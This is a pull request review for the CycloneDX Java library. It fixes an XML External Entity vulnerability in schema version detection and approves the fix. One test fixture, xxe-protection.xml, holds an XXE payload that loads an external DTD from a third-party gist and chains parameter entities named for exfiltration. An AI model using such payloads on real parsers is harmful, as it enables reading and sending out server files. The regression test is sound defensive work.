### PR TITLE
Fix possible XXE during XML schema version detection

### PR DESCRIPTION
**Pull request by mr-zepol**
During some testing, it was found that the parser for XML was vulnerable to XML External Entity (XXE) Processing.

After further investigation from Sonatype team, it was found it was due to the XPath Processing done to get the schema version

### CODE REVIEW

File: src/main/java/org/cyclonedx/parsers/XmlParser.java [hunk 1]
```diff
@@ -278,22 +289,56 @@ public boolean isValid(final InputStream inputStream, final Version schemaVersio
...
 
-    private NodeList extractAllNamespaceDeclarations(final InputSource in) throws XPathExpressionException {
-        final XPathFactory xPathFactory = XPathFactory.newInstance();
-        final XPath xPath = xPathFactory.newXPath();
-        final XPathExpression xPathExpression = xPath.compile("//namespace::*");
-        return (NodeList) xPathExpression.evaluate(in, XPathConstants.NODESET);
+    private List<String> extractAllNamespaceDeclarations(final InputSource in)
+        throws ParserConfigurationException, IOException, SAXException
+    {
+        Document doc = createSecureDocument(in);
```
Comment (prabhu) [inline src/main/java/org/cyclonedx/parsers/XmlParser.java:310]: This is a good fix. However, I am not sure why a core library has to take a position to disable all use of DTD. What if an organization legitimately needs them especially for external references etc? Best to expose these as non-breaking settings and make it clear that users and applications are responsible for security and cannot offload security to core libraries.

Comment (mr-zepol) [reply src/main/java/org/cyclonedx/parsers/XmlParser.java:310]: > This is a good fix. However, I am not sure why a core library has to take a position to disable all use of DTD. What if an organization legitimately needs them especially for external references etc? Best to expose these as non-breaking settings and make it clear that users and applications are responsible for security and cannot offload security to core libraries.

I thought about this but then I realized this part is not doing any parsing of the content, this is to get the schema version to parse to the right version, for the deserialization we use Jackson who by default has this protection enabled https://github.com/FasterXML/jackson-dataformat-xml/issues/190 so even if we wanted to do this we would need to change the default behavior of Jackson

File: src/test/resources/security/xxe-protection.xml [hunk 2]
```diff
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://gist.githubusercontent.com/agustin-mrtz/593ab443b77890d052e55899b16b61a8/raw/3cdd376bba0007145fa2bbacb9abe36cbd5a43ce/file.dtd"> %sp; %param1; %exfil;]>
```
Comment (nscuro) [inline src/test/resources/security/xxe-protection.xml:2]: Is it possible to change this to some URL or local file path that is *not* controlled by a 3rd party?

File: src/main/java/org/cyclonedx/parsers/XmlParser.java (hunk 1 above)
Comment (nscuro) [reply src/main/java/org/cyclonedx/parsers/XmlParser.java:310]: Disabling it is fine and desired IMO. An alternative would be to allow users to provide their own `DocumentBuilderFactory`, but defaulting to a locked-down version.

But that feels like something we can think about when there's an immediate need for it, i.e. when someone needs it.

File: src/test/resources/security/xxe-protection.xml (hunk 2 above)
Comment (mr-zepol) [reply src/test/resources/security/xxe-protection.xml]: > Is it possible to change this to some URL or local file path that is _not_ controlled by a 3rd party?

Updated it, committed the wrong file while testing

**Comment by mr-zepol** [comment]
hey @nscuro for some reason I can't reply to your last comment, I can do this in a new PR, I want to focus this on the fix, and then we can add the option to set their on `DocumentBuilderFactory` but to be honest I find it useless, this is not to parse the file, this is to get the schema version, the actual process is done with Jackson

**Review by nscuro — APPROVED** [review]
@mr-zepol I wasn't saying we should implement that, I was merely pointing out we *could* do it, but **only** when people actually start asking for it, which I think will not happen. So all good.

**Comment by jkowalleck** [comment]
see https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8

**Pull request merged**